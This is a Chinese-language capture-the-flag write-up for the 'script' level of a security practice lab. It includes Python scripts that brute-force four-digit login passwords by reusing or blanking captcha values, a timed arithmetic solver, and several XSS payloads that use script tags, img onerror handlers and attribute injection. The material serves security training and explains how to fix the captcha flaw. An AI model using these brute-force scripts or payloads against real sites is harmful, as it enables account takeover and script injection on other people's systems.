网络安全实验室CTF—脚本关 writeup

  • key又又找不到了
  • 快速口算
  • 这个题目是空的
  • 怎么就是不弹出key呢?
  • 知识点:验证码发布流程
  • 逗比验证码第一期
  • 逗比验证码第二期
  • 逗比验证码第三期(SESSION)
  • 微笑一下就能过关了
  • 逗比的手机验证码
  • 激情燃烧的岁月
  • 验证码识别
  • 知识点:XSS跨站脚本攻击
  • XSS基础关
  • XSS基础关2:简单绕过
  • XSS基础关3:检测与构造
  • Principle很重要的XSS

网络安全实验室CTF链接

key又又找不到了

分值: 200
小明这次哭了,key又找不到了!!! key啊,你究竟藏到了哪里,为什么我看到的页面上都没有啊!!!!!!

通关地址

进入链接后,显示" 到这里找key ",查看网页源码发现跳转链接

    <body><a href="./search_key.php">_到这里找key__</a></body>

点击链接但很快跳转到另一页面:“想找key,从哪里来回哪里去,我这里没有key!哼!

http://.../no_key_is_here_forever.php   //跳转后网页的URL

尝试用Burp Suite抓包

将第一次抓取的页面Send to Repeater后发送数据包,在Response中得到key

快速口算

分值: 350
小明要参加一个高技能比赛,要求每个人都要能够快速口算四则运算,2秒钟之内就能够得到结果,但是小明就是一个小学生没有经过特殊的培训,那小明能否通过快速口算测验呢?

通关地址

需要在2秒钟内提交计算结果,需要用到Python脚本
先用填入答案提交一次数据,用Burp Suite对数据进行抓包,获取所需的Cookie和变量名信息

通过Python脚本实现2秒内提交计算结果,代码如下:

# -*- coding : utf-8 -*-
import requests
import re   //正则表达式url = 'http://lab1.xseclab.com/xss2_0d557e6d2a4ac08b749b61473a075be1/index.php'head = {'Cookie': 'PHPSESSID=98db957833ad06f20d20765aed472328'}source = requests.get(url, headers=head).content.decode('utf-8')
expression = re.search(r'(\d+[+*])+(\d+[+*])+\((\d+[+*])+(\d+)\)', source).group()
print(expression)
val = str(eval(expression))
print(val)
post = {'v': val}
result = requests.post(url, headers=head, data=post).content.decode('utf-8')
print(result)

运行脚本即获取到key

5326*77767+530*(5326+77767)
458226332
<html><head><meta http-equiv=Content-Type content="text/html;charset=utf-8"></head><body>key is 123iohHKHJ%^&*(jkh   </body>
</html>

这个题目是空的

分值: 100
Tips:这个题目真不是随便设置的。 什么才是空的呢? 通关地址:没有,请直接提交答案(小写即可)

null”代表多数编程语言中代表空字节或空指针,所以提交“null”通关。

怎么就是不弹出key呢?

分值: 150
提交说明:提交前14个字符即可过关

通关链接

打开网页后显示“ 点击之后怎么没有反应呢?说好的弹窗呢? ”,尝试点击页面,发现左下角浏览器执行了JavaScript代码,javascript:a();,但并未产生弹窗,查看网页源代码:

<script>function alert(a) {return false;}document.write = function () {return false;}function prompt(a) {return false;}var a = function () {……   //省略部分代码alert("key is first 14 chars" + d);}
</script>

发现在<script>标签中,存在三个扰乱的函数return false;删除前三个函数,在本地重新执行代码(注:需有phpstudy环境支持),得到弹窗,截取前十四位字符,即为key。

知识点:验证码发布流程

1.用户请求访问或刷新网页,服务器后台生成验证码图片及图片编码,
2.将验证码信息加密后放入Session或Cookie;
3.提交表单信息后,调用生成验证码的程序;
4.核对验证码无误、数据合法后写入数据库;
用户正常刷新页面后,会再次访问该表单页面,验证码图片被动更新,Session和Cookie存入的值也跟着改变,用不同方式模拟post传参直接发送数据,从而达到绕过验证码的目的,修复此漏洞的方法:在核对验证码后,便清空Session和Cookie中保存验证码的值,再判断数据的合法性,最后写入数据库,以此提高验证码的安全性。

逗比验证码第一期

分值: 100
逗比的验证码,有没有难道不一样吗?

通关链接

进入登陆页面后,User信息已给出,密码提示为:第一位不为0的4位纯数字,但需要输入验证码登陆。
先尝试登陆,用Burp Suite抓取数据包,获取所需的Cookie和变量名信息:


将抓取的页面Send to Repeater后发送数据包,在Response中显示“pwd error”,尝试在Request中修改数据包信息,根据给出的提示:“有没有难道不一样?”发现在不刷新页面重制验证码的情况下,可以重复修改pwd的值,以达到绕过验证码爆破密码的作用;
以下为爆破密码的Python脚本代码:

# -*- coding : utf-8 -*-
import requestsurl = 'http://lab1.xseclab.com/vcode1_bcfef7eacf7badc64aaf18844cdb1c46/login.php'for password in range(1000, 9999):head = {'Cookie': 'PHPSESSID=98db957833ad06f20d20765aed472328'}post = {'username': 'admin', 'pwd': password, 'vcode': 'ws2b', 'submit': 'submit'}result = requests.post(url, headers=head, data=post).textprint(password)if len(result) != 9:print("The passowrd is : "+str(password))print(result)break

运行脚本即获取到登陆密码为:1238,同时得到key

//从1000开始:
1237
1238
The passowrd is : 1238
key is LJLJL789sdf#@sd

逗比验证码第二期

分值: 150
验证便失效的验证码
通关链接

进入登陆页面后,User信息已给出,密码提示为:第一位不为0的4位纯数字,但需要输入验证码登陆,验证码一次失效
先尝试登陆,用Burp Suite抓取数据包,获取所需的Cookie和变量名信息:

将抓取的页面Send to Repeater后发送数据包,在Response中显示“pwd error”,尝试在Request中修改数据包信息,根据给出的提示:“一次便失效”发现当验证码为空的情况下,可以重复修改pwd的值,以达到绕过验证码爆破密码的作用;
以下为逗比验证码第二期爆破密码的Python脚本代码:

# -*- coding : utf-8 -*-
import requestsurl = 'http://lab1.xseclab.com/vcode2_a6e6bac0b47c8187b09deb20babc0e85/login.php'for password in range(1000, 9999):head = {'Cookie': 'PHPSESSID=98db957833ad06f20d20765aed472328'}post = {'username': 'admin', 'pwd': password, 'vcode': '', 'submit': 'submit'}result = requests.post(url, headers=head, data=post).textprint(password)if len(result) != 9:print("The passowrd is : " + str(password))print(result)break

运行脚本即获取到登陆密码为:1228,同时得到key

//从1000开始:
1227
1228
The passowrd is : 1228
key is LJLJL789ss33fasvxcvsdf#@sd

逗比验证码第三期(SESSION)

分值: 150
尼玛,验证码怎么可以这样逗比。。
验证码做成这样,你家里人知道吗?
通关链接

原理同逗比验证码第二期,修改相关数据,运行脚本即可得到key

微笑一下就能过关了

逗比的手机验证码

激情燃烧的岁月

验证码识别

知识点:XSS跨站脚本攻击

有关XSS跨站脚本攻击的详尽内容请看:XSS跨站脚本攻击原理与常见的脚本及《XSS跨站脚本攻击剖析与防御》摘录总结

XSS基础关

分值: 50
XSS基础:很容易就可以过关.XSS类题目必须在平台登录才能进行.登录地址请参考左侧<子系统>

通关链接

注:首先在子系统功能区进行题目平台登陆,然后访问链接

进入页面后,显示“Welcome guest”,有输入框,构造常规payload进行测试:

<script>alert(1);</script>

提交后网页出现两个弹窗一个为“1”,即我们的测试代码,一个为通关提示:“Please use alert(HackingLab)!!

修改输入的JavaScript脚本代码为:

<script>alert(HackingLab);</script>

提交后弹窗显示“success!”,得到key

XSS基础关2:简单绕过

分值: 100
很容易就可以过关.

通关链接

有输入框,尝试简单的XSS注入,但显示检测到XSS脚本

怀疑“<script>”被检测或过滤,尝试通过“<img>标签事件”触发弹窗,构造如下JavaScript脚本:

<img src=x onerror=alert(HackingLab)>

提交查询后弹窗显示“success!”,得到key

XSS基础关3:检测与构造

分值: 130
XSS基础3:检测与构造
Tips:不是很难

通关链接

页面存在两个输入框,尝试了大部分的注入语句,发现都被过滤,但当“value”的值为“alert”时,通过事件可以触发弹窗:

alert' οnmοuseοver='alert(HackingLab)

提交查询后弹窗显示“success!”,得到key

Principle很重要的XSS

网络安全实验室CTF—脚本关 writeup相关推荐

  1. 网络安全实验室3.脚本关

    3.脚本关 1.key又又找不到了 url:http://lab1.xseclab.com/xss1_30ac8668cd453e7e387c76b132b140bb/index.php 点击链接,b ...

  2. 网络安全实验室--上传关

    - title: 网络安全实验室–上传关 关注我的博客,访问更多内容! 基础关题目地址 网络安全实验室之上传关,题目略少,也很基础,如有错误,欢迎在评论中指出. 1.请上传一张jpg格式的图片 只能上 ...

  3. [hackinglab][CTF][脚本关][2020] hackinglab 脚本关 writeup

    脚本关 1 key又又找不到了 关键字: 知识点: 步骤:点击提供的链接后,实际发生了两次跳转,key 在第一次跳转的网页中,key is : yougotit_script_now 脚本关 2 快速 ...

  4. 网络安全实验室(基础关刷题)-WP

    网络安全实验室-基础关-WP[by:luoluo] 1.key在哪里? 答案在源代码里 查看源代码的三种方式:直接右键检查/查看源代码.使用开发者工具.command/control+U flag:j ...

  5. ctf--网络信息安全攻防实验室之基础关writeup

    此篇文章最先发表在个人博客上, 欢迎访问: smiley: 使用的工具 * chrome * python3 * md5 在线工具 (可搜索到)) 第 1 题 Key 在哪里? 分值: 100 过关地 ...

  6. CTF writeup 1_网络安全实验室

    基础关 1.key在哪里? 过关地址 打开网址 "key就在这里中,你能找到他吗? " 看看源代码有没有线索~果然 <html><head><meta ...

  7. [hackinglab][CTF][综合关][2020] hackinglab 综合关 writeup

    [hackinglab][CTF][解密关][2020] hackinglab 上传关 writeup 综合关 1 渗透测试第一期 概要:在于绑定admin用户,进行修改密码!(手机号码仔细!!!) ...

  8. 网络安全实验室|网络信息安全(基础关)

    网络安全实验室|网络信息安全(基础关) 一. key在哪里? 分值: 100 过关地址 答:在火狐中开启代理,打开burpsuite,点击过关地址进行抓包 抓到的包如下 右击发送给repiter,点击 ...

  9. 网络安全实验室基础关第二题

    网络安全实验室基础关第二题 题目: 解题思路: 了解当今常见加密算法得出以下结论 使用在线网站利用常见加密算法将数据加密,未得其果,遂常规操作向度娘提问,知道了rot13加密算法, ROT13(回转1 ...

最新文章

  1. 网站改版都要注重哪些因素?
  2. python爬虫的scrapy安装+pymongo的安装
  3. Spring MVC @ModelAttribute 详解
  4. no ip domain-lookup 什么意思
  5. 用python祝福父亲节_父亲节到来 最适合给年老的父亲祝福语
  6. 搭建、使用与维护私有PyPi仓库
  7. Linq的内部执行原理浅析
  8. 21天学通C语言-学习笔记(12)
  9. 2019年上海理工大学《高等代数》试题和答案——解题人(蔡宇)
  10. 机器学习基础算法(5)
  11. 英雄联盟修复服务器,快速修复win10专业版玩英雄联盟连接不上服务器方法
  12. 图解积分法_计算机模拟图解积分法求气相吸收总传质单元数
  13. DART booster
  14. ORACLE US7ASCII编码 读取时乱码问题
  15. 程序员分级-八个等级
  16. 若依分离版整合IJpay实现第三方支付-(微信支付篇_v2)
  17. 气化器中BOG和EAG分别是什么意思?
  18. seo优化:如何写伪原创文章
  19. 幼儿抽象逻辑思维举例_小学数学中抽象思维的培养
  20. LightSensor传感器

热门文章

  1. 三味眼中的十二“最”……
  2. linux查询主机信息命令,用来获取Linux主机信息的5个常用命令
  3. 利用递归函数,实现一个阶乘函数,支持正数和负数的阶乘
  4. 51单片机学习——PWM
  5. 计算机微机原理心得体会,微机原理课设体会心得体会
  6. php中 act什么意思,剑网三act是什么意思?详解丐帮act概念
  7. 基于模糊聚类和协同过滤的混合推荐系统
  8. MySQL中 (GROUP BY 用法)和(ORDER BY用法)
  9. 计算机谈音乐南山南,马頔:从《南山南》到《是首俗歌》,恰是我们难以言表的流年...
  10. Linux FFmpeg依赖库编译